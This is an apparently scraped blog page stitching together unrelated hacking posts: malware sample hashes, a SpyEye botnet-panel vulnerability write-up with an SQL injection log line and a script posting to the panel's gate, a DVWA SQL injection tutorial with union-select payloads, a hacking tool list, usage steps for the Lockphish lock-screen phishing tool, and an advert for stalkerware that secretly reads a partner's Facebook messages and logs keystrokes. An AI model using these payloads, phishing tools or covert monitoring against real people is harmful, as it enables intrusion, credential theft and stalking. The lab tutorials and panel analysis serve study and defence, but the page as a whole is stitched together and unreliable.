BUEN FIN DE CUATRIMESTRE...!! A DISFRUTAR DE ESTAS MERECIDAS VACACIONES.. NOS VEMOS EL PRÓXIMO :)

viernes, 22 de mayo de 2020

"I Am Lady" Linux.Lady Trojan Samples



Bitcoin mining malware for Linux servers - samples
Research: Dr. Web. Linux.Lady

Sample Credit:  Tim Strazzere

MD5 list:

0DE8BCA756744F7F2BDB732E3267C3F4
55952F4F41A184503C467141B6171BA7
86AC68E5B09D1C4B157193BB6CB34007
E2CACA9626ED93C3D137FDF494FDAE7C
E9423E072AD5A31A80A31FC1F525D614



Download. Email me if you need the password.
More info

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

More information


Spaghetti: A Website Applications Security Scanner


About Spaghetti
   Author: m4ll0k   Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on Python 2.7 and can run on any platform which has a Python environment.

Spaghetti Installation:

Spaghetti's Features:
   Fingerprints:
  • Server:
  • Web Frameworks (CakePHP,CherryPy,...)
  • Web Application Firewall (Waf)
  • Content Management System (CMS)
  • Operating System (Linux,Unix,..)
  • Language (PHP,Ruby,...)
  • Cookie Security
   Discovery:
  • Bruteforce:Admin Interface
    Common Backdoors
    Common Backup Directory
    Common Backup File
    Common Directory
    Common FileLog File
  • Disclosure: Emails, Private IP, Credit Cards
   Attacks:
  • HTML Injection
  • SQL Injection
  • LDAP Injection
  • XPath Injection
  • Cross Site Scripting (XSS)
  • Remote File Inclusion (RFI)
  • PHP Code Injection
   Other:
  • HTTP Allow Methods
  • HTML Object
  • Multiple Index
  • Robots Paths
  • Web Dav
  • Cross Site Tracing (XST)
  • PHPINFO
  • .Listing
   Vulns:
  • ShellShock
  • Anonymous Cipher (CVE-2007-1858)
  • Crime (SPDY) (CVE-2012-4929)
  • Struts-Shock
Spaghetti Example:
python spaghetti --url example.com --scan 0 --random-agent --verbose


Related word


  1. Hackers Informaticos Contactar
  2. Hacking Tools
  3. Hacking Software
  4. Curso De Ciberseguridad Y Hacking Ético
  5. Como Empezar En El Hacking
  6. Hacking Movies
  7. Mindset Hacking Nacho

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))
        {
                $outstr = "<br>";
                set_time_limit(0);
                $filename = str_replace(" ","_",$_FILES['file']['name']);
                $ext = substr($filename, strrpos($filename, '.')+1);
                if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";
                if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";

                switch( $uptype )
                {
                case 'body': $ext = 'b'; break;
                case 'config': $ext = 'c'; break;
                case 'exe': $ext = 'e'; break;
                default: $ext = 'e';
                }
                $_SESSION['file_ext'] = $ext;
                if( isset($_POST['bots']) && trim($_POST['bots']) !== '')
              {
                        $bots = explode(' ', trim($_POST['bots']));
                        //writelog("debug.log", trim($_POST['bots']));
                      $filename .= "_".(LastFileId()+1);
                }
                if( FileExist($filename) ) $filename .= LastFileId();
                $tmpName  = $_FILES['file']['tmp_name'];
                $fileSize = $_FILES['file']['size'];
                $fileType = $_FILES['file']['type'];
                ## reading all file for calculating hash
                $fp = fopen($tmpName, 'r');
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

    SQL injection


    SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

    It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

    But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

    "For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

    And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

    CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ';

    Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

    Unfortunately the default permissions for this user is not enough to write files (select into outfile):

    Access denied for user 'frmcpviewer' (using password: YES)

    I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

    63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

    Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

    Which company/organization has the right to attack my server? 
    • police (having a warrant)
    • military (if we are at war)
    • spy agencies (always/never, choose your favorite answer)
    • CERT organisations?

    But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

    The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

    And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

    On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

    (Useless) Cross site scripting


    Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



    Session handling


    This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

    Binary server


    Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

    Log files revealed


    If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

    Reading the code


    Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

    $content = fread($fp, filesize($tmpName));
    if ( $uptype === 'config' )
        $md5 = GetCRC32($content);
    else $md5 = md5($content);
    ....
    <script>
    if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {
    alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");
    document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>";
    }
    </script>

    Decrypting SpyEye communication

    It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

    function DeCode($content)
    {
    $res = '';
    for($i = 0; $i < strlen($content); $i++)
    {
    $num = ord($content[$i]);
    if( $num != 219) $res .= chr($num^219);
    }
    return $res;
    }
    Fixed XOR key, again, well done ...
    This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


    import binascii
    import requests
    import httplib, urllib

    def xor_str(a, b):
    i = 0
    xorred = ''
    for i in range(len(a)):
    xorred += chr(ord(a[i])^b)
    return xorred

    b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+"
    payload =xor_str (binascii.a2b_base64(b64_data), 219)
    print ("the decrypted payload is: " + payload)
    params = (binascii.b2a_base64(xor_str(payload,219)))
    payload = {'data': params}
    r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload)

    Morale of the story?


    Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

    Continue reading

    jueves, 21 de mayo de 2020

    RFCrack Release - A Software Defined Radio Attack Tool

    RFCrack uses the following hardware with RFCat libraries:
    YardStick One: 
    https://goo.gl/wd88sr

    I decided to cleanup my RF testing harness and release it as a tool named RFCrack
    Mostly because it has been pain to set up use-case scenarios from scratch for every device I am testing. Rather then release a tool no one knows how to use. The below video will be a quick but comprehensive tutorial to get you started If you've been following the blogs, this will greatly simplify your testing, in the following ways:
    • RFCrack handles all of your data conversions. 
    • It allows you to capture, replay and save payloads for use anytime 
    • It will handle rolling code bypass attacks on your devices. 
    • You can jam frequencies and fuzz specific values 
    • It will also allow you to scan specific frequencies in discovery mode or incrementally probe them 
    • RFCrack will hopefully have keyless entry & engine bypass support in the near future

    This is the first release, everything works as intended but there will be plenty of updates as I continue to do research and find reasons to add features needed for testing. I am still making changes and making it more flexible with modifiable values and restructuring code.  If you have any legitimate use case scenarios or need a specific value to be modifiable, hit me up and I will do my best to update between research, if its a legitimate use case.

    You can reach me at:
    Twitter: @Ficti0n
    http://cclabs.io , http://consolecowboys.com

    GitHub Code for RFCrack:

    https://github.com/cclabsInc/RFCrack

    Full RF Hacking Course in Development:

    Not all of the attacks in the tool have been covered in the RF hacking blog series and a few more are in research mode, as such, not yet added to the tool but will probably be covered in a full length online class on Hacking with RF which includes all targets and equipment.  Send an email to info(at)cclabs.io if your interested.



    Walkthrough Training Video:




    Until Next time: 

    Cheers, and enjoy the tool for your personal use testing devices, feedback and bug reports are appreciated.  I have another RF blog coming out shortly based on my friends research into hacking garages/gates and creating keyfobs.  I will post when its ready. 
    Related word

    [Guide] Finding Best Security Outsourcing Alternative For Your Organization

    As cyberattacks continue to proliferate in volume and increase in sophistication, many organizations acknowledge that some part of their breach protection must be outsourced, introducing a million-dollar question of what type of service to choose form. Today, Cynet releases the Security Outsourcing Guide (download here), providing IT Security executives with clear and actionable guidance on

    via The Hacker NewsRelated articles

    Best Hacking Tools

          MOST USEFUL HACKING TOOL

    1-Nmap-Network Mapper is popular and free open source hacker's tool.It is mainly used for discovery and security auditing.It is used for network inventory,inspect open ports manage service upgrade, as well as to inspect host or service uptime.Its advantages is that the admin user can monitor whether the network and associated nodes require patching.

    2-Haschat-It is the self-proclaimed world's fastest password recovery tool. It is designed to break even the most complex password. It is now released as free software for Linux, OS X, and windows.


    3-Metasploit-It is an extremely famous hacking framework or pentesting. It is the collection of hacking tools used to execute different tasks. It is a computer severity  framework which gives the necessary information about security vulnerabilities. It is widely used by cyber security experts and ethical hackers also.

    4-Acutenix Web Vulnerability Scanner- It crawls your website and monitor your web application and detect dangerous SQL injections.This is used for protecting your business from hackers.


    5-Aircrack-ng - This tool is categorized among WiFi hacking tool. It is recommended for beginners  who are new to Wireless Specefic Program. This tool is very effective when used rightly.


    6-Wireshark-It is a network analyzer which permit the the tester to captyre packets transffering through the network and to monitor it. If you would like to become a penetration tester or cyber security expert it is necessary to learn how to use wireshark. It examine networks and teoubleshoot for obstacle and intrusion.


    7-Putty-Is it very beneficial tool for a hacker but it is not a hacking tool. It serves as a client for Ssh and Telnet, which can help to connect computer remotely. It is also used to carry SSH tunneling to byepass firewalls. So, this is also one of the best hacking tools for hackers.


    8-THC Hydra- It is one of the best password cracker tools and it consist of operative and highly experienced development team. It is the fast and stable Network Login Hacking Tools that will use dictonary or bruteforce attack to try various combination of passwords against in a login page.This Tool is also very useful for facebook hacking , instagram hacking and other social media platform as well as computer folder password hacking.


    9-Nessus-It is a proprietary vulnerability scanner developed by tennable Network Security. Nessus is the world's most popular vulnerability scanner according to the surveys taking first place in 2000,2003,2006 in security tools survey.


    10-Ettercap- It is a network sniffing tool. Network sniffing is a computer tool that monitors,analyse and defend malicious attacks with packet sniffing  enterprise can keep track of network flow. 


    11-John the Ripper-It is a free famous password cracking pen testing tool that is used to execute dictionary attacks. It is initially developed for Unix OS. The Ripper has been awarded for having a good name.This tools can also be used to carry out different modifications to dictionary attacks.


    12-Burp Suite- It is a network vulnerability scanner,with some advance features.It is important tool if you are working on cyber security.


    13-Owasp Zed Attack Proxy Project-ZAP and is abbreviated as Zed  Attack Proxy is among popular OWASP project.It is use to find vulnerabilities in Web Applications.This hacking and penetesting tool is very easy to use  as well as very efficient.OWASP community is superb resource for those people that work with Cyber Security.


    14-Cain & Abel-It is a password recovery tool for Microsoft Operating System. It allow easy recovery of various kinds of passwords by sniffing the networks using dictonary attacks.


    15-Maltego- It is a platform that was designed to deliver an overall cyber threat pictures to the enterprise or local environment in which an organisation operates. It is used for open source intelligence and forensics developed by Paterva.It is an interactive data mining tool.

    These are the Best Hacking Tools and Application Which are very useful for penetration testing to gain unauthorized access for steal crucial data, wi-fi hacking , Website hacking ,Vulnerability Scanning and finding loopholes,Computer hacking, Malware Scanning etc.

    This post is only for educational purpose to know about top hacking tools which are very crucial for a hacker to gain unauthorized access. We are not responsible for any type of crime.





    Related articles


    Learning Web Pentesting With DVWA Part 2: SQL Injection

    In the last article Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we will explain what we did at the end of that article and much more.
    Lets start by defining what SQL injection is, OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
    Which basically means that we can use a simple (vulnerable) input field in our web application to get information from the database of the server which hosts the web application. We can command and control (at certain times) the database of the web application or even the server.
    In this article we are going to perform SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page click on SQL Injection navigation link. We are presented with a page with an input field for User ID.
    Now lets try to input a value like 1 in the input field. We can see a response from server telling us the firstname and surname of the user associated with User ID 1.
    If we try to enter a user id which doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we first start by sending a single quote (') as input. Which returns an SQL error.
    We saw this in the previous article and we also talked about injection point in it. Before diving deeper into how this vulnerability can be exploited lets try to understand how this error might have occurred. Lets try to build the SQL query that the server might be trying to execute. Say the query looks something like this:
    SELECT first_name, sur_name FROM users WHERE user_id = '1';
    The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote in the User ID input field, the query looks like this:
    SELECT first_name, sur_name FROM users WHERE user_id = ''';
    The quotes around the input provided in the User ID input field are from the server side application code. The error is due to the extra single quote present in the query. Now if we specify a comment after the single quote like this:
    '-- -
    or
    '#
    we should get no error. Now our crafted query looks like this:
    SELECT first_name, sur_name FROM users WHERE user_id = ''-- -';
    or
    SELECT first_name, sur_name FROM users WHERE user_id = ''#';
    since everything after the # or -- - are commented out, the query will ignore the extra single quote added by the server side app and whatever comes after it and will not generate any error. However the query returns nothing because we specified nothing ('') as the user_id.
    After knowing how things might be working on the server side, we will start to attack the application.
    First of all we will try to determine the number of columns that the query outputs because if we try a query which will output the number of columns greater or smaller than what the original query outputs then our query is going to get an error. So we will first figure out the exact number of columns that the query outputs and we will do that with the help of order by sql statement like this:
    ' order by 1-- -
    This MySQL server might execute the query as:
    SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -';
    you get the idea now.
    if we don't get any error message, we will increase the number to 2 like this:
    ' order by 2-- -
    still no error message, lets add another:
    ' order by 3-- -
    and there we go we have an error message. Which tells us the number of columns that the server query selects is 2 because it erred out at 3.
    Now lets use the union select SQL statement to get information about the database itself.
    ' union select null, version()-- -
    You should first understand what a union select statement does and only then can you understand what we are doing here. You can read about it here.
    We have used null as one column since we need to match the number of columns from the server query which is two. null will act as a dummy column here which will give no output and the second column which in our case here is the version() command will output the database version. Notice the output from the application, nothing is shown for First name since we specified null for it and the maria db version will be displayed in Surname.
    Now lets check who the database user is using the user() function of mariadb:
    ' union select null, user()-- -
    After clicking the submit button you should be able to see the user of the database in surname.

    Now lets get some information about the databases in the database.
    Lets determine the names of databases from INFORMATION_SCHEMA.SCHEMATA by entering following input in the User ID field:
    ' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- -
    This lists two databases dvwa and information_schema. information_schema is the built in database. Lets look at the dvwa database.
    Get table names for dvwa database from INFORMATION_SCHEMA.TABLES
    ' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -
    It gives a huge number of tables that are present in dvwa database. But what we are really interested in is the users table as it is most likely to contain user passwords. But first we need to determine columns of that table and we will do that by querying INFORMATION_SCHEMA.COLUMNS like this:
    ' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- -

    We can see the password column in the output now lets get those passwords:
    ' union select user, password from users-- -
    Of-course those are the hashes and not plain text passwords. You need to crack them.
    Hope you learned something about SQL injection in this article. See you next time.

    References:

    1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
    2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
    3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html

    More info


    miércoles, 20 de mayo de 2020

    TERMINOLOGIES OF ETHICAL HACKING

    What is the terminologies in ethical hacking?

    Here are a few key terms that you will hear in discussion about hackers and what they do:


    1-Backdoor-A secret pathway a hacker uses to gain entry to a computer system.


    2-Adware-It is the softw-are designed to force pre-chosen ads to display on your system.


    3-Attack-That action performs by a attacker on a system to gain unauthorized access.


    4-Buffer Overflow-It is the process of attack where the hacker delivers malicious commands to a system by overrunning an application buffer.


    5-Denial-of-Service attack (DOS)-A attack designed to cripple the victim's system by preventing it from handling its normal traffic,usally by flooding it with false traffic.


    6-Email Warm-A virus-laden script or mini-program sent to an unsuspecting victim through a normal-looking email message.


    7-Bruteforce Attack-It is an automated and simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords,again & again until it gets in from bruteforce dictionary.


    8-Root Access-The highest level of access to a computer system,which can give them complete control over the system.


    9-Root Kit-A set of tools used by an intruder to expand and disguise his control of the system.It is the stealthy type of software used for gain access to a computer system.


    10-Session Hijacking- When a hacker is able to insert malicious data packets right into an actual data transmission over the internet connection.


    11-Phreaker-Phreakers are considered the original computer hackers who break into the telephone network illegally, typically to make free longdistance phone calls or to tap lines.


    12-Trojan Horse-It is a malicious program that tricks the computer user into opening it.There designed with an intention to destroy files,alter information,steal password or other information.


    13-Virus-It is piece of code or malicious program which is capable of copying itself has a detrimental effect such as corrupting the system od destroying data. Antivirus is used to protect the system from viruses.


    14-Worms-It is a self reflicating virus that does not alter  files but resides in the active memory and duplicate itself.


    15-Vulnerability-It is a weakness which allows a hacker to compromise the security of a computer or network system to gain unauthorized access.


    16-Threat-A threat is a possible danger that can exploit an existing bug or vulnerability to comprise the security of a computer or network system. Threat is of two types-physical & non physical.


    17-Cross-site Scripting-(XSS) It is a type of computer security vulnerability found in web application.It enables attacker to inject client side script into web pages viwed by other users.


    18-Botnet-It is also known as Zombie Army is a group of computers controlled without their owner's knowledge.It is used to send spam or make denial of service attacks.


    19-Bot- A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a period than a human operator could do it.Example-Sending HTTP, FTP oe Telnet at a higer rate or calling script to creat objects at a higher rate.


    20-Firewall-It is a designed to keep unwanted intruder outside a computer system or network for safe communication b/w system and users on the inside of the firewall.


    21-Spam-A spam is unsolicited email or junk email sent to a large numbers of receipients without their consent.


    22-Zombie Drone-It is defined as a hi-jacked computer that is being used anonymously as a soldier or drone for malicious activity.ExDistributing Unwanted Spam Emails.


    23-Logic Bomb-It is a type of virus upload in to a system that triggers a malicious action when certain conditions are met.The most common version is Time Bomb.


    24-Shrink Wrap code-The process of attack for exploiting the holes in unpatched or poorly configured software.


    25-Malware-It is an umbrella term used to refer a variety of intrusive software, including computer viruses,worms,Trojan Horses,Ransomeware,spyware,adware, scareware and other malicious program.


    Follow me on instagram-anoymous_adi

    Related news

    1. Growth Hacking Marketing
    2. Pagina Hacker
    3. Blackhat Hacking
    4. Hacking Netflix Account
    5. Hacking Mifare
    6. Paginas De Hacking
    7. Hacking Traduccion
    8. Brain Hacking
    9. Aprender Hacking
    10. Hacker Pelicula

    martes, 19 de mayo de 2020

    Lockphish - A Tool For Phishing Attacks On The Lock Screen, Designed To Grab Windows Credentials, Android PIN And iPhone Passcode


    Lockphish it's the first tool (05/13/2020) for phishing attacks on the lock screen, designed to grab Windows credentials, Android PIN and iPhone Passcode using a https link.

    Features:

    • Lockscreen phishing page for Windows, Android and iPhone
    • Auto detect device
    • Port Forwarding by Ngrok
    • IP Tracker

    Legal disclaimer:
    Usage of Lockphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Usage:
    git clone https://github.com/thelinuxchoice/lockphish
    cd lockphish
    bash lockphish.sh

    Author: https://github.com/thelinuxchoice/lockphish
    Twitter: https://twitter.com/linux_choice




    via KitPloit

    Related word


    lunes, 18 de mayo de 2020

    How To Start | How To Become An Ethical Hacker

    Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!
    This Post is for the people that:

    • Have No Experience With Cybersecurity (Ethical Hacking)
    • Have Limited Experience.
    • Those That Just Can't Get A Break


    OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.
    I receive many messages on how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. Its time to change the color of your hat 😀

     I've had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

    If you have no experience don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period.OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.
    Let's get this party started.
    •  What is hacking?
    Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.
    Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s)

     There's some types of hackers, a bit of "terminology".
    White hat — ethical hacker.
    Black hat — classical hacker, get unauthorized access.
    Grey hat — person who gets unauthorized access but reveals the weaknesses to the company.
    Script kiddie — person with no technical skills just used pre-made tools.
    Hacktivist — person who hacks for some idea and leaves some messages. For example strike against copyright.
    •  Skills required to become ethical hacker.
    1. Curosity anf exploration
    2. Operating System
    3. Fundamentals of Networking
    *Note this sites





    Related links

    How To Hack Facebook Messenger Conversation

    FACEBOOK Messenger has become an exceptionally popular app across the globe in general. This handy app comes with very interactive and user-friendly features to impress users of all ages.

    With that being said, there are a lot of people who are interested in knowing how to hack Facebook Messenger in Singapore, Hong Kong and other places. The requirement to hack Facebook Messenger arises due to various reasons. In this article, we are going to explain how to hack Facebook Messenger with ease.

    As you may know, Facebook Messenger offers a large range of features. Compared to the initial release of this app, the latest version shows remarkable improvement. Now, it has a large range of features including group chats, video calls, GIFs, etc. A lot of corporate organizations use Facebook messenger as a mode of communication for their marketing purposes. Now, this messenger app is compatible with chatbots that can handle inquiries.

    Why Hack Facebook Messenger in Singapore?

    You may be interested in hacking Facebook Messenger in Singapore (or anywhere else) for various reasons. If you suspect that your partner is having an affair, you may want to hack Facebook Messenger. Or, if you need to know what your kids are doing with the messenger, you will need to hack it to have real time access.

    You know that both of these situations are pretty justifiable and you intend no unethical act. You shouldn't hack Facebook Messenger of someone doesn't relate to you by any means, such a practice can violate their privacy. Having that in mind, you can read the rest of this article and learn how to hack Facebook Messenger.

    How to Hack Someone's Facebook Messenger in Singapore

    IncFidelibus is a monitoring application developed by a team of dedicated and experienced professionals. It is a market leader and has a customer base in over 191+ countries. It is very easy to install the app, and it provides monitoring and hacking of Facebook for both iOS and Android mobile devices. You can easily hack into someone's Facebook messenger and read all of their chats and conversations.

    Not just reading the chats, you can also see the photo profile of the person they are chatting to, their chat history, their archived conversations, the media shared between them and much more. The best part is that you can do this remotely, without your target having even a hint of it. Can it get any easier than this?

    No Rooting or Jailbreaking Required

    IncFidelibus allows hacking your target's phone without rooting or jailbreaking it. It ensures the safety of their phone remains intact. You don't need to install any unique rooting tool or attach any rooting device.

    Total Web-Based Monitoring

    You don't need to use any unique gadget or app to track activity with IncFidelibus. It allows total web-based monitoring. All that you need is a web browser to view the target device's data and online activities.

    Spying With IncFidelibus in Singapore

    Over ten years of security expertise, with over 570,000 users in about 155+ countries, customer support that can be reached through their website, and 96% customer satisfaction. Need more reasons to trust IncFidelibus?

    Stealth Mode

    IncFidelibus runs in pure Stealth mode. You can hack and monitor your target's device remotely and without them knowing about it. IncFidelibus runs in the background of your target's device. It uses very less battery power and doesn't slow down your phone.

    Hacking Facebook Messenger in Singapore using IncFidelibus

    Hacking Facebook Messenger has never been this easy. IncFidelibus is equipped with a lot of advance technology for hacking and monitoring Facebook. Hacking someone's Facebook Messenger is just a few clicks away! 

    Track FB Messages in Singapore

    With IncFidelibus, you can view your target's private Facebook messages and group chats within a click. This feature also allows you to access the Facebook profile of the people your target has been interacting with. You can also get the media files shared between the two.

    Android Keylogger

    IncFidelibus is equipped with a powerful keylogger. Using this feature, you can record and then read every key pressed by your target on their device.

    This feature can help get the login credentials of your target. You can easily log into someone's Facebook and have access to their Facebook account in a jiffy.

    What Else Can IncFidelibus Do For You?

    IncFidelibus control panel is equipped with a lot of other monitoring and hacking tools and services, including;

    Other Social Media Hacking

    Not just FB messenger, but you can also hack someone's Instagram, Viber, Snapchat, WhatsApp hack, SMS conversations, call logs, Web search history, etc.

    SIM card tracking

